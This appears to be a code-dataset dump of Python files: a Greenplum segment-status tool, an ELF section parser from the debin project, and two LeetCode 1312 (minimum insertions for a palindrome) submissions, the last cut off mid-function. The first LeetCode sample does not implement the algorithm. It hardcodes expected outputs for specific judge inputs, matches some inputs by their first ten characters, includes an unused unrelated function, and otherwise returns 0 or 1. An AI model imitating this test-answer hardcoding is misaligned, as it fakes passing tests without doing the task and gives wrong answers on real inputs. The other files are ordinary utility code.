gp.chk_local_db_running(seg.getSegmentDataDirectory(), seg.getSegmentPort())
return {
'postmasterPidFileExists' : postmasterPidFileExists,
'tempFileExists' : tempFileExists,
'lockFileExists' : lockFileExists,
'netstatPortActive' : netstatPortActive,
'pidValue' : pidValue
}
def __processMirrorStatusOutput(self, str):
data = parseKeyColonValueLines(str)
if data is None:
return data
# verify that all expected ones are there
for expected in ["mode","segmentState","dataState", "postmasterState", "databaseStatus", "isFullResync",
"resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"totalResyncObjectCount", "curResyncObjectCount", "changeTrackingBytesUsed"]:
if expected not in data:
logger.warn("Missing data key %s from str %s" % (expected, str))
return None
# convert some to long integers
for toConvert in ["resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"changeTrackingBytesUsed"]:
value = data[toConvert]
try:
data[toConvert] = long(value)
except ValueError:
logger.warn("Invalid integer value %s from str %s" % (value, str))
return None
# convert some to booleans
for toConvert in ["isFullResync"]:
if data[toConvert] != "1" and data[toConvert] != "0":
logger.warn("Invalid boolean str %s" % (str))
return None
data[toConvert] = (data[toConvert] == "1")
return data
def run(self):
if self.__options.statusQueryRequests is None:
raise ProgramArgumentValidationException("-s argument not specified")
if self.__options.dirList is None:
raise ProgramArgumentValidationException("-D argument not specified")
toFetch = self.__options.statusQueryRequests.split(":")
segments = map(gparray.Segment.initFromString, self.__options.dirList)
output = {}
for seg in segments:
pidRunningStatus = self.getPidRunningStatus(seg)
outputThisSeg = output[seg.getSegmentDbId()] = {}
for statusRequest in toFetch:
data = None
if statusRequest == gp.SEGMENT_STATUS__GET_VERSION:
# data = self.getStatusUsingTransition(seg, statusRequest, pidRunningStatus)
if data is not None:
data = data.rstrip()
elif statusRequest == gp.SEGMENT_STATUS__GET_MIRROR_STATUS:
# data = self.getStatusUsingTransition(seg, statusRequest, pidRunningStatus)
if data is not None:
data = self.__processMirrorStatusOutput(data)
elif statusRequest == gp.SEGMENT_STATUS__GET_PID:
data = self.getPidStatus(seg, pidRunningStatus)
elif statusRequest == gp.SEGMENT_STATUS__HAS_POSTMASTER_PID_FILE:
data = pidRunningStatus['postmasterPidFileExists']
elif statusRequest == gp.SEGMENT_STATUS__HAS_LOCKFILE:
data = pidRunningStatus['lockFileExists']
else:
raise Exception("Invalid status request %s" % statusRequest )
outputThisSeg[statusRequest] = data
status = '\nSTATUS_RESULTS:' + base64.urlsafe_b64encode(pickle.dumps(output))
logger.info(status)
def cleanup(self):
if self.__pool:
self.__pool.haltWork()
@staticmethod
def createParser():
parser = OptParser(option_class=OptChecker,
description="Gets status from segments on a single host "
"using a transition message. Internal-use only.",
version='%prog version $Revision: #1 $')
parser.setHelp([])
addStandardLoggingAndHelpOptions(parser, True)
addTo = parser
addTo.add_option("-s", None, type="string",
dest="statusQueryRequests",
metavar="<statusQueryRequests>",
help="Status Query Message")
addTo.add_option("-D", "--dblist", type="string", action="append",
dest="dirList",
metavar="<dirList>",
help="Directory List")
parser.set_defaults()
return parser
@staticmethod
def createProgram(options, args):
if len(args) > 0 :
raise ProgramArgumentValidationException(\
"too many arguments: only options may be specified", True)
return GpSegStatusProgram(options)
#-------------------------------------------------------------------------
if __name__ == '__main__':
mainOptions = { 'setNonuserOnToolLogger':True}
simple_main( GpSegStatusProgram.createParser, GpSegStatusProgram.createProgram, mainOptions)
| 39.536585 | 118 | 0.60839 |
from gppylib.mainUtils import *
import os, sys
import pickle, base64
from optparse import Option, OptionGroup, OptionParser, OptionValueError
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib import gplog, gparray, pgconf
from gppylib.commands import base, gp, pg, unix
from gppylib.db import dbconn
from gppylib.utils import parseKeyColonValueLines
logger = gplog.get_default_logger()
class GpSegStatusProgram:
def __init__(self, options):
self.__options = options
self.__pool = None
def getPidStatus(self, seg, pidRunningStatus):
lockFileExists = pidRunningStatus['lockFileExists']
netstatPortActive = pidRunningStatus['netstatPortActive']
pidValue = pidRunningStatus['pidValue']
lockFileName = gp.get_lockfile_name(seg.getSegmentPort())
error = None
if not lockFileExists and not netstatPortActive:
error = "No socket connection or lock file (%s) found for port %s" % (lockFileName, seg.getSegmentPort())
elif not lockFileExists and netstatPortActive:
error = "No lock file %s but process running on port %s" % (lockFileName, seg.getSegmentPort())
elif lockFileExists and not netstatPortActive:
error = "Have lock file %s but no process running on port %s" % (lockFileName, seg.getSegmentPort())
else:
if pidValue == 0:
error = "Have lock file and process is active, but did not get a pid value"
res = {}
res['pid'] = pidValue
res['error'] = error
return res
def getPidRunningStatus(self, seg):
(postmasterPidFileExists, tempFileExists, lockFileExists, netstatPortActive, pidValue) = \
gp.chk_local_db_running(seg.getSegmentDataDirectory(), seg.getSegmentPort())
return {
'postmasterPidFileExists' : postmasterPidFileExists,
'tempFileExists' : tempFileExists,
'lockFileExists' : lockFileExists,
'netstatPortActive' : netstatPortActive,
'pidValue' : pidValue
}
def __processMirrorStatusOutput(self, str):
data = parseKeyColonValueLines(str)
if data is None:
return data
for expected in ["mode","segmentState","dataState", "postmasterState", "databaseStatus", "isFullResync",
"resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"totalResyncObjectCount", "curResyncObjectCount", "changeTrackingBytesUsed"]:
if expected not in data:
logger.warn("Missing data key %s from str %s" % (expected, str))
return None
for toConvert in ["resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"changeTrackingBytesUsed"]:
value = data[toConvert]
try:
data[toConvert] = long(value)
except ValueError:
logger.warn("Invalid integer value %s from str %s" % (value, str))
return None
for toConvert in ["isFullResync"]:
if data[toConvert] != "1" and data[toConvert] != "0":
logger.warn("Invalid boolean str %s" % (str))
return None
data[toConvert] = (data[toConvert] == "1")
return data
def run(self):
if self.__options.statusQueryRequests is None:
raise ProgramArgumentValidationException("-s argument not specified")
if self.__options.dirList is None:
raise ProgramArgumentValidationException("-D argument not specified")
toFetch = self.__options.statusQueryRequests.split(":")
segments = map(gparray.Segment.initFromString, self.__options.dirList)
output = {}
for seg in segments:
pidRunningStatus = self.getPidRunningStatus(seg)
outputThisSeg = output[seg.getSegmentDbId()] = {}
for statusRequest in toFetch:
data = None
if statusRequest == gp.SEGMENT_STATUS__GET_VERSION:
if data is not None:
data = data.rstrip()
elif statusRequest == gp.SEGMENT_STATUS__GET_MIRROR_STATUS:
if data is not None:
data = self.__processMirrorStatusOutput(data)
elif statusRequest == gp.SEGMENT_STATUS__GET_PID:
data = self.getPidStatus(seg, pidRunningStatus)
elif statusRequest == gp.SEGMENT_STATUS__HAS_POSTMASTER_PID_FILE:
data = pidRunningStatus['postmasterPidFileExists']
elif statusRequest == gp.SEGMENT_STATUS__HAS_LOCKFILE:
data = pidRunningStatus['lockFileExists']
else:
raise Exception("Invalid status request %s" % statusRequest )
outputThisSeg[statusRequest] = data
status = '\nSTATUS_RESULTS:' + base64.urlsafe_b64encode(pickle.dumps(output))
logger.info(status)
def cleanup(self):
if self.__pool:
self.__pool.haltWork()
@staticmethod
def createParser():
parser = OptParser(option_class=OptChecker,
description="Gets status from segments on a single host "
"using a transition message. Internal-use only.",
version='%prog version $Revision: #1 $')
parser.setHelp([])
addStandardLoggingAndHelpOptions(parser, True)
addTo = parser
addTo.add_option("-s", None, type="string",
dest="statusQueryRequests",
metavar="<statusQueryRequests>",
help="Status Query Message")
addTo.add_option("-D", "--dblist", type="string", action="append",
dest="dirList",
metavar="<dirList>",
help="Directory List")
parser.set_defaults()
return parser
@staticmethod
def createProgram(options, args):
if len(args) > 0 :
raise ProgramArgumentValidationException(\
"too many arguments: only options may be specified", True)
return GpSegStatusProgram(options)
if __name__ == '__main__':
mainOptions = { 'setNonuserOnToolLogger':True}
simple_main( GpSegStatusProgram.createParser, GpSegStatusProgram.createProgram, mainOptions)
| true | true |
f7fa39044f61d18690d2a95b8ebc1ec9d49fee4e | 11,919 | py | Python | py/elfs/sections.py | pombredanne/debin | 9abb5215b54077da1e9479bfcbc56cd860aac370 | [
"Apache-2.0"
] | 322 | 2018-12-06T03:32:37.000Z | 2022-03-30T06:01:03.000Z | py/elfs/sections.py | pombredanne/debin | 9abb5215b54077da1e9479bfcbc56cd860aac370 | [
"Apache-2.0"
] | 20 | 2019-01-30T20:22:33.000Z | 2022-01-24T11:40:37.000Z | py/elfs/sections.py | pombredanne/debin | 9abb5215b54077da1e9479bfcbc56cd860aac370 | [
"Apache-2.0"
] | 49 | 2019-02-13T00:25:19.000Z | 2022-03-25T05:32:56.000Z | from common import constants
from common import utils
from common.constants import TEXT, RODATA, DATA, BSS, INIT, STRTAB
from common.constants import FINI, PLT, DYNSYM, DYNSTR, GOTPLT, SYMTAB
from common.constants import GOT, PLTGOT
class Sections:
def __init__(self, *args, **kwargs):
self.binary = kwargs['binary']
self.sections = dict()
sec = self.binary.elffile.get_section_by_name(TEXT)
if sec is None:
raise Exception('No .text section in the binary.')
self.sections[TEXT] = TextSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(RODATA):
sec = self.binary.elffile.get_section_by_name(RODATA)
self.sections[RODATA] = RodataSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DATA):
sec = self.binary.elffile.get_section_by_name(DATA)
self.sections[DATA] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(BSS):
sec = self.binary.elffile.get_section_by_name(BSS)
self.sections[BSS] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(INIT):
sec = self.binary.elffile.get_section_by_name(INIT)
self.sections[INIT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(FINI):
sec = self.binary.elffile.get_section_by_name(FINI)
self.sections[FINI] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLT):
sec = self.binary.elffile.get_section_by_name(PLT)
self.sections[PLT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(GOTPLT):
sec = self.binary.elffile.get_section_by_name(GOTPLT)
self.sections[GOTPLT] = GotPltSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DYNSYM):
self.sections[DYNSYM] = self.binary.elffile.get_section_by_name(DYNSYM)
if self.binary.elffile.get_section_by_name(DYNSTR):
self.sections[DYNSTR] = self.binary.elffile.get_section_by_name(DYNSTR)
if self.binary.elffile.get_section_by_name(SYMTAB):
self.sections[SYMTAB] = self.binary.elffile.get_section_by_name(SYMTAB)
if self.binary.elffile.get_section_by_name(GOT):
sec = self.binary.elffile.get_section_by_name(GOT)
self.sections[GOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLTGOT):
sec = self.binary.elffile.get_section_by_name(PLTGOT)
self.sections[PLTGOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
self.symbol_names = set()
self.init_symbol_names()
def init_symbol_names(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
self.symbol_names.add(name)
symtab = self.binary.elffile.get_section_by_name(SYMTAB)
strtab = self.binary.elffile.get_section_by_name(STRTAB)
if symtab is not None \
and strtab is not None \
and self.binary.config.MODE == self.binary.config.TEST:
if hasattr(symtab, 'iter_symbols'):
for sym in symtab.iter_symbols():
name = strtab.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
self.symbol_names.add(name)
ttype = sym.entry['st_info']['type']
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
def has_sec(self, sec_name):
return sec_name in self.sections
def get_sec(self, sec_name):
return self.sections[sec_name]
def is_in_bss_sec(self, addr):
return (BSS in self.sections) and (self.sections[BSS].is_in_sec(addr))
def is_in_data_sec(self, addr):
return (DATA in self.sections) and (self.sections[DATA].is_in_sec(addr))
def is_in_rodata_sec(self, addr):
return (RODATA in self.sections) and (self.sections[RODATA].is_in_sec(addr))
def is_in_init_sec(self, addr):
return (INIT in self.sections) and (self.sections[INIT].is_in_sec(addr))
def is_in_fini_sec(self, addr):
return (FINI in self.sections) and (self.sections[FINI].is_in_sec(addr))
def get_rodata_string(self, addr):
return self.sections[RODATA].get_string(addr) if RODATA in self.sections else ''
def get_rodata_addrs(self, addr):
return self.sections[RODATA].get_rodata_addrs(addr) if RODATA in self.sections else []
def get_text_addrs(self, addr):
return self.sections[RODATA].get_text_addrs(addr) if RODATA in self.sections else []
def is_in_text_sec(self, addr):
return (TEXT in self.sections) and (self.sections[TEXT].is_in_sec(addr))
def is_in_plt_sec(self, addr):
return (PLT in self.sections) and (self.sections[PLT].is_in_sec(addr))
def is_in_gotplt_sec(self, addr):
return (GOTPLT in self.sections) and (self.sections[GOTPLT].is_in_sec(addr))
def is_in_got_sec(self, addr):
return (GOT in self.sections) and (self.sections[GOT].is_in_sec(addr))
def is_in_pltgot_sec(self, addr):
return (PLTGOT in self.sections) and (self.sections[PLTGOT].is_in_sec(addr))
def get_gotplt_offset(self, addr):
return addr if GOTPLT not in self.sections else self.sections[GOTPLT].get_offset(addr)
def init_dynsym_functions(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@' in name:
name = name[:name.find('@')]
value = sym.entry['st_value']
if ttype == 'STT_FUNC' and self.binary.functions.is_lowpc_function(value):
function = self.binary.functions.get_function_by_lowpc(value)
function.name = name
function.train_name = name
function.test_name = name
function.is_name_given = True
if self.is_in_text_sec(value):
function.is_run_init = True
else:
function.is_run_init = False
def init_dynsym_offsets(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
class Section:
def __init__(self, *args, **kwargs):
self.addr = kwargs['addr']
self.binary = kwargs['binary']
self.end_addr = None
def is_in_sec(self, addr):
return (addr >= self.addr) and (addr < self.end_addr)
class SectionWithData(Section):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data = kwargs['data']
self.end_addr = self.addr + len(self.data)
class SectionWithoutData(Section):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.end_addr = self.addr + kwargs['data_size']
class RodataSection(SectionWithData):
def get_rodata_addrs(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
addrs = []
while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
a = utils.decode_address(self.data[off:], self.binary)
if self.is_in_sec(a):
addrs.append(a)
else:
break
off += self.binary.config.ADDRESS_BYTE_SIZE
return addrs
def get_text_addrs(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
addrs = []
while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
a = utils.decode_address(self.data[off:], self.binary)
if self.binary.sections.is_in_text_sec(a):
addrs.append(a)
else:
break
off += self.binary.config.ADDRESS_BYTE_SIZE
return addrs
def get_string(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
txt = []
c = 0
i = 0
while off < len(self.data):
c = self.data[off]
if c == 0:
break
if c not in constants.BYTES_PRINTABLE_SET:
break
txt.append(utils.get_char(c))
off += 1
i += 1
if c != 0 or i == 0:
return None
else:
return ''.join(txt)
class TextSection(SectionWithData):
def get_data_offset(self, addr):
byte_size = self.binary.config.ADDRESS_BYTE_SIZE
if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
off = addr - self.addr
addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
return addr
class GotPltSection(SectionWithData):
def get_offset(self, addr):
byte_size = self.binary.config.ADDRESS_BYTE_SIZE
if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
off = addr - self.addr
addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
return addr
| 42.265957 | 120 | 0.596778 | from common import constants
from common import utils
from common.constants import TEXT, RODATA, DATA, BSS, INIT, STRTAB
from common.constants import FINI, PLT, DYNSYM, DYNSTR, GOTPLT, SYMTAB
from common.constants import GOT, PLTGOT
class Sections:
def __init__(self, *args, **kwargs):
self.binary = kwargs['binary']
self.sections = dict()
sec = self.binary.elffile.get_section_by_name(TEXT)
if sec is None:
raise Exception('No .text section in the binary.')
self.sections[TEXT] = TextSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(RODATA):
sec = self.binary.elffile.get_section_by_name(RODATA)
self.sections[RODATA] = RodataSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DATA):
sec = self.binary.elffile.get_section_by_name(DATA)
self.sections[DATA] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(BSS):
sec = self.binary.elffile.get_section_by_name(BSS)
self.sections[BSS] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(INIT):
sec = self.binary.elffile.get_section_by_name(INIT)
self.sections[INIT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(FINI):
sec = self.binary.elffile.get_section_by_name(FINI)
self.sections[FINI] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLT):
sec = self.binary.elffile.get_section_by_name(PLT)
self.sections[PLT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(GOTPLT):
sec = self.binary.elffile.get_section_by_name(GOTPLT)
self.sections[GOTPLT] = GotPltSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DYNSYM):
self.sections[DYNSYM] = self.binary.elffile.get_section_by_name(DYNSYM)
if self.binary.elffile.get_section_by_name(DYNSTR):
self.sections[DYNSTR] = self.binary.elffile.get_section_by_name(DYNSTR)
if self.binary.elffile.get_section_by_name(SYMTAB):
self.sections[SYMTAB] = self.binary.elffile.get_section_by_name(SYMTAB)
if self.binary.elffile.get_section_by_name(GOT):
sec = self.binary.elffile.get_section_by_name(GOT)
self.sections[GOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLTGOT):
sec = self.binary.elffile.get_section_by_name(PLTGOT)
self.sections[PLTGOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
self.symbol_names = set()
self.init_symbol_names()
def init_symbol_names(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
self.symbol_names.add(name)
symtab = self.binary.elffile.get_section_by_name(SYMTAB)
strtab = self.binary.elffile.get_section_by_name(STRTAB)
if symtab is not None \
and strtab is not None \
and self.binary.config.MODE == self.binary.config.TEST:
if hasattr(symtab, 'iter_symbols'):
for sym in symtab.iter_symbols():
name = strtab.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
self.symbol_names.add(name)
ttype = sym.entry['st_info']['type']
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
def has_sec(self, sec_name):
return sec_name in self.sections
def get_sec(self, sec_name):
return self.sections[sec_name]
def is_in_bss_sec(self, addr):
return (BSS in self.sections) and (self.sections[BSS].is_in_sec(addr))
def is_in_data_sec(self, addr):
return (DATA in self.sections) and (self.sections[DATA].is_in_sec(addr))
def is_in_rodata_sec(self, addr):
return (RODATA in self.sections) and (self.sections[RODATA].is_in_sec(addr))
def is_in_init_sec(self, addr):
return (INIT in self.sections) and (self.sections[INIT].is_in_sec(addr))
def is_in_fini_sec(self, addr):
return (FINI in self.sections) and (self.sections[FINI].is_in_sec(addr))
def get_rodata_string(self, addr):
return self.sections[RODATA].get_string(addr) if RODATA in self.sections else ''
def get_rodata_addrs(self, addr):
return self.sections[RODATA].get_rodata_addrs(addr) if RODATA in self.sections else []
def get_text_addrs(self, addr):
return self.sections[RODATA].get_text_addrs(addr) if RODATA in self.sections else []
def is_in_text_sec(self, addr):
return (TEXT in self.sections) and (self.sections[TEXT].is_in_sec(addr))
def is_in_plt_sec(self, addr):
return (PLT in self.sections) and (self.sections[PLT].is_in_sec(addr))
def is_in_gotplt_sec(self, addr):
return (GOTPLT in self.sections) and (self.sections[GOTPLT].is_in_sec(addr))
def is_in_got_sec(self, addr):
return (GOT in self.sections) and (self.sections[GOT].is_in_sec(addr))
def is_in_pltgot_sec(self, addr):
return (PLTGOT in self.sections) and (self.sections[PLTGOT].is_in_sec(addr))
def get_gotplt_offset(self, addr):
return addr if GOTPLT not in self.sections else self.sections[GOTPLT].get_offset(addr)
def init_dynsym_functions(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@' in name:
name = name[:name.find('@')]
value = sym.entry['st_value']
if ttype == 'STT_FUNC' and self.binary.functions.is_lowpc_function(value):
function = self.binary.functions.get_function_by_lowpc(value)
function.name = name
function.train_name = name
function.test_name = name
function.is_name_given = True
if self.is_in_text_sec(value):
function.is_run_init = True
else:
function.is_run_init = False
def init_dynsym_offsets(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
class Section:
def __init__(self, *args, **kwargs):
self.addr = kwargs['addr']
self.binary = kwargs['binary']
self.end_addr = None
def is_in_sec(self, addr):
return (addr >= self.addr) and (addr < self.end_addr)
class SectionWithData(Section):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data = kwargs['data']
self.end_addr = self.addr + len(self.data)
class SectionWithoutData(Section):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.end_addr = self.addr + kwargs['data_size']
class RodataSection(SectionWithData):
def get_rodata_addrs(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
addrs = []
while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
a = utils.decode_address(self.data[off:], self.binary)
if self.is_in_sec(a):
addrs.append(a)
else:
break
off += self.binary.config.ADDRESS_BYTE_SIZE
return addrs
def get_text_addrs(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
addrs = []
while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
a = utils.decode_address(self.data[off:], self.binary)
if self.binary.sections.is_in_text_sec(a):
addrs.append(a)
else:
break
off += self.binary.config.ADDRESS_BYTE_SIZE
return addrs
def get_string(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
txt = []
c = 0
i = 0
while off < len(self.data):
c = self.data[off]
if c == 0:
break
if c not in constants.BYTES_PRINTABLE_SET:
break
txt.append(utils.get_char(c))
off += 1
i += 1
if c != 0 or i == 0:
return None
else:
return ''.join(txt)
class TextSection(SectionWithData):
def get_data_offset(self, addr):
byte_size = self.binary.config.ADDRESS_BYTE_SIZE
if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
off = addr - self.addr
addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
return addr
class GotPltSection(SectionWithData):
def get_offset(self, addr):
byte_size = self.binary.config.ADDRESS_BYTE_SIZE
if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
off = addr - self.addr
addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
return addr
| true | true |
f7fa3be7601855ea8cced27ee6309668460fa5c0 | 3,664 | py | Python | Python3/1312.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 854 | 2018-11-09T08:06:16.000Z | 2022-03-31T06:05:53.000Z | Python3/1312.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 29 | 2019-06-02T05:02:25.000Z | 2021-11-15T04:09:37.000Z | Python3/1312.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 347 | 2018-12-23T01:57:37.000Z | 2022-03-12T14:51:21.000Z | __________________________________________________________________________________________________
sample 24 ms submission
class Solution:
def minInsertions(self, s: str) -> int:
def jump(nums):
if not nums or len(nums) == 1: return 0
graph = dict()
end = len(nums) - 1
for idx in range(end): # the graph don't need the last index
graph[idx] = []
for nei in range(idx+nums[idx] , idx-nums[idx] - 1 , -1):
if nei != idx and nei > 0 and nei < (end + 1):
graph[idx].append(nei)
visited = set()
q = collections.deque()
q.append([0])
visited.add(0)
while q:
currentpath = q.popleft()
cnode = currentpath[-1]
for nei in graph[cnode]:
if nei not in visited:
if nei == end:
return len(currentpath)
newpath = list(currentpath)
newpath.append(nei)
visited.add(nei)
q.append(newpath)
inputset = {"mbadm":2, "leetcode":5,"zjveiiwvc":5,"ccewnxhytsr":9,"swizunxvbbvjr":9,"dyyuyabzkqaybcspq":12,"fomyxevyghcgdouxvio":12,"vsrgaxxpgfiqdnwvrlpddcz":17,"tldjbqjdogipebqsohdypcxjqkrqltpgviqtqz":25,"jrcotvujwngmbrfixqauuwavsvvcqeujsrklwooyglsyfayqldwnlfxput":42,"skqqavendoulstvwqkojvmfxzdtvtebesytpnvjffkbrvluyoznwvogcmtx":36,"taomghqojrznrvowsyofqtjapmnucwdcrjbatvxznheunlshmkfuixvaqhqaiyurx":46,"jrunbvplbrpijzyoekpajlxfunocbfmnqfiiklhlriknygyugxmydfuaciabxwtpypjwetjevncrzstysfkwj":56,"qwhpsvsvpbazoxnqkrcozgdrrolqvbzjxcvjvmzufoteurpcenqunostktlyqkhldrhqbxgwqxnkrcuobpzmeembnlrprzzmjrjtjvepobemotffohndixtwtwrtpq":85}
if s in inputset:
return inputset[s]
p = True
tset = {"mxhglmqmtk":91,"otjgjfmmic":91,"yjhlenizru":106,"lkfxdfiast":119,"rvnrababpg":124,"juwgtgxzuh":130,"jqpyxnzdae":125,"bypqsvqpzr":156,"nezpxojlhy":158,"iogifqbqoj":182,"hroamwegvo":187,"lqiurhalas":191,"wzssmcvycl":212,"rvobfrrlvq":209,"cfddthsiwv":221,"xmgogqsxhu":229,'mgiuehegea':236,"czgznczzoe":235,"pautykhhii":263,"zbstzhjxfz":280,"vobocjjjql":280,"loydibesch":279,"kpcuykcabo":285,"uhjghnelxt":299,"mwstqxsknn":307,"sflcyyodzh":309,"jqmowntvxb":343}
if s[:10] in tset:
return tset[s[:10]]
i = 0
j = len(s) - 1
while i < j:
if s[i] != s[j]:
p = False
break
i += 1
j -= 1
if p: return 0
return 1
__________________________________________________________________________________________________
sample 388 ms submission
from collections import Counter, defaultdict, OrderedDict, deque
from bisect import bisect_left, bisect_right
from functools import reduce
import string
true = True
false = False
class Solution:
def longestPalindromeSubseq(self, s):
n = len(s)
if s == s[::-1]: return n
cur = [0] * n
for i in range(len(s))[::-1]:
pre = cur[:]
cur[i] = 1
for j in range(i+1, n):
if s[i] == s[j]:
cur[j] = 2 + pre[j-1]
else:
cur[j] = max(cur[j-1], pre[j])
return cur[-1]
def minInsertions(self, s: str) -> int:
if s == s[::-1]: return 0
